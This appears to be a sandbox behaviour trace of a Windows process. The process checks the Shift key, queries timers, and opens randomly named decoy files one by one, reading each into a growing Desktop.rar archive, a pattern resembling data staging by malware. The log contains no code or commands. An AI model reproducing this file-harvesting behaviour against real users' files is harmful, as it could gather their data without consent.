Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
System Get Time type = Performance Ctr, time = 13211114475 True 1
File Read filename = 0SoXJeVDMd8XB.wav, size = 1048576, size_out = 53827 True 1
File Read filename = 0SoXJeVDMd8XB.wav, size = 994749, size_out = 0 True 1
Keyboard Read virtual_key_code = VK_SHIFT, result_out = 0 True 1
System Get Time type = Ticks, time = 10899493 True 1
System Get Time type = Performance Ctr, time = 13212280596 True 1
System Get Time type = Ticks, time = 10899493 True 1
System Get Time type = Ticks, time = 10899509 True 1
System Get Time type = Ticks, time = 10899509 True 1
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = Ticks, time = 10899883 True 1
System Get Time type = Performance Ctr, time = 13437021817 True 1
System Get Time type = Ticks, time = 10899945 True 3
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
File Write filename = Desktop.rar, size = 53984 True 1
File Write filename = Desktop.rar, size = 101 True 1
File Create filename = 4XGIZDiLaaAzBLi8uMJ.gif, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900195 True 1
System Get Time type = Ticks, time = 10900195 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
System Get Time type = Performance Ctr, time = 13462281104 True 1
File Read filename = 4XGIZDiLaaAzBLi8uMJ.gif, size = 1048576, size_out = 34749 True 1
File Read filename = 4XGIZDiLaaAzBLi8uMJ.gif, size = 1013827, size_out = 0 True 1
System Get Time type = Ticks, time = 10900195 True 1
System Get Time type = Performance Ctr, time = 13462564984 True 1
System Get Time type = Ticks, time = 10900195 True 3
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
System Get Time type = Ticks, time = 10900195 True 1
System Get Time type = Performance Ctr, time = 13463057023 True 1
System Get Time type = Ticks, time = 10900195 True 3
File Write filename = Desktop.rar, size = 34880 True 1
File Write filename = Desktop.rar, size = 107 True 1
File Create filename = 8ZCScAn2t4O2J7-d.doc, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
System Get Time type = Performance Ctr, time = 13463617651 True 1
File Read filename = 8ZCScAn2t4O2J7-d.doc, size = 1048576, size_out = 6103 True 1
File Read filename = 8ZCScAn2t4O2J7-d.doc, size = 1042473, size_out = 0 True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = Performance Ctr, time = 13463764445 True 1
System Get Time type = Ticks, time = 10900211 True 4
System Get Time type = Performance Ctr, time = 13463982241 True 1
System Get Time type = Ticks, time = 10900211 True 3
File Write filename = Desktop.rar, size = 6144 True 1
File Write filename = Desktop.rar, size = 102 True 1
File Create filename = AVuWJQwE5di201z9 d.ots, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:20 (UTC) True 1
System Get Time type = Performance Ctr, time = 13464298504 True 1
File Read filename = AVuWJQwE5di201z9 d.ots, size = 1048576, size_out = 56152 True 1
File Read filename = AVuWJQwE5di201z9 d.ots, size = 992424, size_out = 0 True 1
System Get Time type = Ticks, time = 10900211 True 1
System Get Time type = Performance Ctr, time = 13464433258 True 1
System Get Time type = Ticks, time = 10900211 True 4
System Get Time type = Performance Ctr, time = 13464954266 True 1
System Get Time type = Ticks, time = 10900211 True 3
File Write filename = Desktop.rar, size = 56288 True 1
File Write filename = Desktop.rar, size = 106 True 1
File Create filename = CjID.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900226 True 1
System Get Time type = Ticks, time = 10900226 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
System Get Time type = Performance Ctr, time = 13465574069 True 1
File Read filename = CjID.mp3, size = 1048576, size_out = 52912 True 1
File Read filename = CjID.mp3, size = 995664, size_out = 0 True 1
System Get Time type = Ticks, time = 10900226 True 1
System Get Time type = Performance Ctr, time = 13465788819 True 1
System Get Time type = Ticks, time = 10900226 True 4
System Get Time type = Performance Ctr, time = 13466220026 True 1
System Get Time type = Ticks, time = 10900226 True 3
File Write filename = Desktop.rar, size = 53056 True 1
File Write filename = Desktop.rar, size = 92 True 1
File Create filename = czSQaVnIQO 0LFtEP.flv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900242 True 1
System Get Time type = Ticks, time = 10900242 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
System Get Time type = Performance Ctr, time = 13466826965 True 1
File Read filename = czSQaVnIQO 0LFtEP.flv, size = 1048576, size_out = 64574 True 1
File Read filename = czSQaVnIQO 0LFtEP.flv, size = 984002, size_out = 0 True 1
System Get Time type = Ticks, time = 10900242 True 1
System Get Time type = Performance Ctr, time = 13467043611 True 1
System Get Time type = Ticks, time = 10900242 True 3
System Get Time type = Ticks, time = 10900335 True 1
System Get Time type = Performance Ctr, time = 13476522789 True 1
System Get Time type = Ticks, time = 10900335 True 3
File Write filename = Desktop.rar, size = 64704 True 1
File Write filename = Desktop.rar, size = 106 True 1
File Create filename = desktop.ini, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900335 True 1
System Get Time type = Ticks, time = 10900335 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
System Get Time type = Performance Ctr, time = 13477230184 True 1
File Read filename = desktop.ini, size = 1048576, size_out = 282 True 1
File Read filename = desktop.ini, size = 1048294, size_out = 0 True 1
System Get Time type = Ticks, time = 10900351 True 1
System Get Time type = Performance Ctr, time = 13477532209 True 1
System Get Time type = Ticks, time = 10900351 True 4
System Get Time type = Performance Ctr, time = 13477595192 True 1
System Get Time type = Ticks, time = 10900351 True 3
File Write filename = Desktop.rar, size = 176 True 1
File Write filename = Desktop.rar, size = 93 True 1
File Create filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
System Get Time type = Ticks, time = 10900351 True 1
System Get Time type = Ticks, time = 10900351 True 1
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
System Get Time type = Performance Ctr, time = 13477884501 True 1
File Read filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, size = 1048576, size_out = 89167 True 1
File Read filename = dfxuFxjX5YwdPMIH\2A58ceH2t.png, size = 959409, size_out = 0 True 1
System Get Time type = Ticks, time = 10900351 True 1
System Get Time type = Performance Ctr, time = 13478029887 True 1
System Get Time type = Ticks, time = 10900351 True 3
System Get Time type = Ticks, time = 10900367 True 1
System Get Time type = Performance Ctr, time = 13479366267 True 1
System Get Time type = Ticks, time = 10900367 True 3
File Write filename = Desktop.rar, size = 89376 True 1
File Write filename = Desktop.rar, size = 114 True 1
Fn
Data
File Create filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13480099743 True 1
Fn
File Read filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, size = 1048576, size_out = 58444 True 1
Fn
Data
File Read filename = dfxuFxjX5YwdPMIH\OsbsjTTafsX31mSiaRnW.ppt, size = 990132, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 1
Fn
System Get Time type = Performance Ctr, time = 13480418697 True 1
Fn
System Get Time type = Ticks, time = 10900367 True 3
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Performance Ctr, time = 13480904298 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 3
Fn
File Write filename = Desktop.rar, size = 58576 True 1
Fn
Data
File Write filename = Desktop.rar, size = 125 True 1
Fn
Data
File Create filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13481491407 True 1
Fn
File Read filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, size = 1048576, size_out = 36157 True 1
Fn
Data
File Read filename = dfxuFxjX5YwdPMIH\YEeHQp1lME uExplJtB3.flv, size = 1012419, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 1
Fn
System Get Time type = Performance Ctr, time = 13481696627 True 1
Fn
System Get Time type = Ticks, time = 10900382 True 3
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Performance Ctr, time = 13498080682 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 36304 True 1
Fn
Data
File Write filename = Desktop.rar, size = 125 True 1
Fn
Data
File Create filename = e-bHwq0LPy0uA9lpR0jp.jpg, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13498843309 True 1
Fn
File Read filename = e-bHwq0LPy0uA9lpR0jp.jpg, size = 1048576, size_out = 70986 True 1
Fn
Data
File Read filename = e-bHwq0LPy0uA9lpR0jp.jpg, size = 977590, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 1
Fn
System Get Time type = Performance Ctr, time = 13499093119 True 1
Fn
System Get Time type = Ticks, time = 10900554 True 3
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Performance Ctr, time = 13499735238 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 3
Fn
File Write filename = Desktop.rar, size = 71168 True 1
Fn
Data
File Write filename = Desktop.rar, size = 108 True 1
Fn
Data
File Create filename = f7MdNo-AKV0.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13500545471 True 1
Fn
File Read filename = f7MdNo-AKV0.mkv, size = 1048576, size_out = 47783 True 1
Fn
Data
File Read filename = f7MdNo-AKV0.mkv, size = 1000793, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 1
Fn
System Get Time type = Performance Ctr, time = 13500792808 True 1
Fn
System Get Time type = Ticks, time = 10900569 True 3
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Performance Ctr, time = 13501208066 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 3
Fn
File Write filename = Desktop.rar, size = 47872 True 1
Fn
Data
File Write filename = Desktop.rar, size = 99 True 1
Fn
Data
File Create filename = Fj4kdfeguFEe8WDxBVP.png, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13501718702 True 1
Fn
File Read filename = Fj4kdfeguFEe8WDxBVP.png, size = 1048576, size_out = 23495 True 1
Fn
Data
File Read filename = Fj4kdfeguFEe8WDxBVP.png, size = 1025081, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 1
Fn
System Get Time type = Performance Ctr, time = 13502069192 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 4
Fn
System Get Time type = Performance Ctr, time = 13502328086 True 1
Fn
System Get Time type = Ticks, time = 10900585 True 3
Fn
File Write filename = Desktop.rar, size = 23584 True 1
Fn
Data
File Write filename = Desktop.rar, size = 107 True 1
Fn
Data
File Create filename = FuvJMN.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13502759548 True 1
Fn
File Read filename = FuvJMN.m4a, size = 1048576, size_out = 63964 True 1
Fn
Data
File Read filename = FuvJMN.m4a, size = 984612, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 1
Fn
System Get Time type = Performance Ctr, time = 13502922029 True 1
Fn
System Get Time type = Ticks, time = 10900601 True 3
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = Performance Ctr, time = 13512273156 True 1
Fn
System Get Time type = Ticks, time = 10900694 True 3
Fn
File Write filename = Desktop.rar, size = 64096 True 1
Fn
Data
File Write filename = Desktop.rar, size = 94 True 1
Fn
Data
File Create filename = gblyrzexggw.exe, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = Ticks, time = 10900694 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:21 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 13512885640 True 1
Fn
File Read filename = gblyrzexggw.exe, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Read filename = gblyrzexggw.exe, size = 3145728, size_out = 3145728 True 1
Fn
System Get Time type = Ticks, time = 10900835 True 1
Fn
System Get Time type = Performance Ctr, time = 13526812910 True 1
Fn
System Get Time type = Ticks, time = 10900835 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 262144 True 12
Fn
Data
File Read filename = gblyrzexggw.exe, size = 4194304, size_out = 3889152 True 1
Fn
System Get Time type = Ticks, time = 10902629 True 1
Fn
System Get Time type = Performance Ctr, time = 28213577408 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
System Get Time type = Ticks, time = 10902722 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 262144 True 15
Fn
Data
File Read filename = gblyrzexggw.exe, size = 4194304, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Performance Ctr, time = 59820875328 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 40160 True 1
Fn
Data
File Write filename = Desktop.rar, size = 103 True 1
Fn
Data
File Create filename = HAuM_g1AD_0J.mp4, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63320669952 True 1
Fn
File Read filename = HAuM_g1AD_0J.mp4, size = 1048576, size_out = 44059 True 1
Fn
Data
File Read filename = HAuM_g1AD_0J.mp4, size = 1004517, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Performance Ctr, time = 63321061989 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
System Get Time type = Ticks, time = 10903892 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Performance Ctr, time = 63321709259 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 3
Fn
File Write filename = Desktop.rar, size = 44160 True 1
Fn
Data
File Write filename = Desktop.rar, size = 100 True 1
Fn
Data
File Create filename = jGh255P.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63322137687 True 1
Fn
File Read filename = jGh255P.m4a, size = 1048576, size_out = 42260 True 1
Fn
Data
File Read filename = jGh255P.m4a, size = 1006316, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 1
Fn
System Get Time type = Performance Ctr, time = 63322304853 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 4
Fn
System Get Time type = Performance Ctr, time = 63322654258 True 1
Fn
System Get Time type = Ticks, time = 10903908 True 3
Fn
File Write filename = Desktop.rar, size = 42368 True 1
Fn
Data
File Write filename = Desktop.rar, size = 95 True 1
Fn
Data
File Create filename = JhTtCfiuDFLeGwcL.bmp, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 63323122692 True 1
Fn
File Read filename = JhTtCfiuDFLeGwcL.bmp, size = 1048576, size_out = 85856 True 1
Fn
Data
File Read filename = JhTtCfiuDFLeGwcL.bmp, size = 962720, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 1
Fn
System Get Time type = Performance Ctr, time = 63323303990 True 1
Fn
System Get Time type = Ticks, time = 10903923 True 3
Fn
System Get Time type = Ticks, time = 10904126 True 1
Fn
System Get Time type = Performance Ctr, time = 63346510474 True 1
Fn
System Get Time type = Ticks, time = 10904126 True 3
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 86048 True 1
Fn
Data
File Write filename = Desktop.rar, size = 104 True 1
Fn
Data
File Create filename = L4T8mDg3vHms9Y.xls, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 66846431859 True 1
Fn
File Read filename = L4T8mDg3vHms9Y.xls, size = 1048576, size_out = 56779 True 1
Fn
Data
File Read filename = L4T8mDg3vHms9Y.xls, size = 991797, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Performance Ctr, time = 66846742333 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904142 True 1
Fn
System Get Time type = Performance Ctr, time = 66847363333 True 1
Fn
System Get Time type = Ticks, time = 10904142 True 3
Fn
File Write filename = Desktop.rar, size = 56912 True 1
Fn
Data
File Write filename = Desktop.rar, size = 102 True 1
Fn
Data
File Create filename = LFfk9JORsG.avi, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 66848426144 True 1
Fn
File Read filename = LFfk9JORsG.avi, size = 1048576, size_out = 69289 True 1
Fn
Data
File Read filename = LFfk9JORsG.avi, size = 979287, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 1
Fn
System Get Time type = Performance Ctr, time = 66848645547 True 1
Fn
System Get Time type = Ticks, time = 10904157 True 3
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Performance Ctr, time = 66849190387 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 3
Fn
File Write filename = Desktop.rar, size = 69472 True 1
Fn
Data
File Write filename = Desktop.rar, size = 98 True 1
Fn
Data
File Create filename = MKzdWyU3NziO.m4a, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:24 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 70348785924 True 1
Fn
File Read filename = MKzdWyU3NziO.m4a, size = 1048576, size_out = 43928 True 1
Fn
Data
File Read filename = MKzdWyU3NziO.m4a, size = 1004648, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Performance Ctr, time = 70349025917 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
System Get Time type = Ticks, time = 10904173 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Performance Ctr, time = 73873027853 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File Write filename = Desktop.rar, size = 44032 True 1
Fn
Data
File Write filename = Desktop.rar, size = 100 True 1
Fn
Data
File Create filename = PWldfUkUS.mp3, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73873693334 True 1
Fn
File Read filename = PWldfUkUS.mp3, size = 1048576, size_out = 3930 True 1
Fn
Data
File Read filename = PWldfUkUS.mp3, size = 1044646, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Performance Ctr, time = 73873840650 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 4
Fn
System Get Time type = Performance Ctr, time = 73873957491 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 3
Fn
File Write filename = Desktop.rar, size = 3984 True 1
Fn
Data
File Write filename = Desktop.rar, size = 95 True 1
Fn
Data
File Create filename = Qes6-o-.docx, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = Ticks, time = 10904407 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73874316231 True 1
Fn
File Read filename = Qes6-o-.docx, size = 1048576, size_out = 100913 True 1
Fn
Data
File Read filename = Qes6-o-.docx, size = 947663, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = Performance Ctr, time = 73874503922 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 4
Fn
System Get Time type = Performance Ctr, time = 73875276474 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 3
Fn
File Write filename = Desktop.rar, size = 101136 True 1
Fn
Data
File Write filename = Desktop.rar, size = 96 True 1
Fn
Data
File Create filename = TYcyuRxH.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = Ticks, time = 10904423 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73875796560 True 1
Fn
File Read filename = TYcyuRxH.mkv, size = 1048576, size_out = 14806 True 1
Fn
Data
File Read filename = TYcyuRxH.mkv, size = 1033770, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Performance Ctr, time = 73876176320 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 4
Fn
System Get Time type = Performance Ctr, time = 73876377848 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 3
Fn
File Write filename = Desktop.rar, size = 14848 True 1
Fn
Data
File Write filename = Desktop.rar, size = 96 True 1
Fn
Data
File Create filename = w9CVHhfkQl0.mkv, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 73876655887 True 1
Fn
File Read filename = w9CVHhfkQl0.mkv, size = 1048576, size_out = 91951 True 1
Fn
Data
File Read filename = w9CVHhfkQl0.mkv, size = 956625, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 1
Fn
System Get Time type = Performance Ctr, time = 73876798647 True 1
Fn
System Get Time type = Ticks, time = 10904438 True 3
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Performance Ctr, time = 73877505539 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 3
Fn
File Write filename = Desktop.rar, size = 92144 True 1
Fn
Data
File Write filename = Desktop.rar, size = 99 True 1
Fn
Data
File Create filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = System Time, time = 2019-04-02 12:04:25 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 77377216901 True 1
Fn
File Read filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, size = 1048576, size_out = 69590 True 1
Fn
Data
File Read filename = wfNksu nJRG5\3rrOtsNWKjt8qLje.swf, size = 978986, size_out = 0 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Performance Ctr, time = 77377515946 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
System Get Time type = Ticks, time = 10904454 True 1
Fn
COM Create interface = EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Performance Ctr, time = 80884153218 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
System Get Time type = Ticks, time = 10904516 True 1
Fn
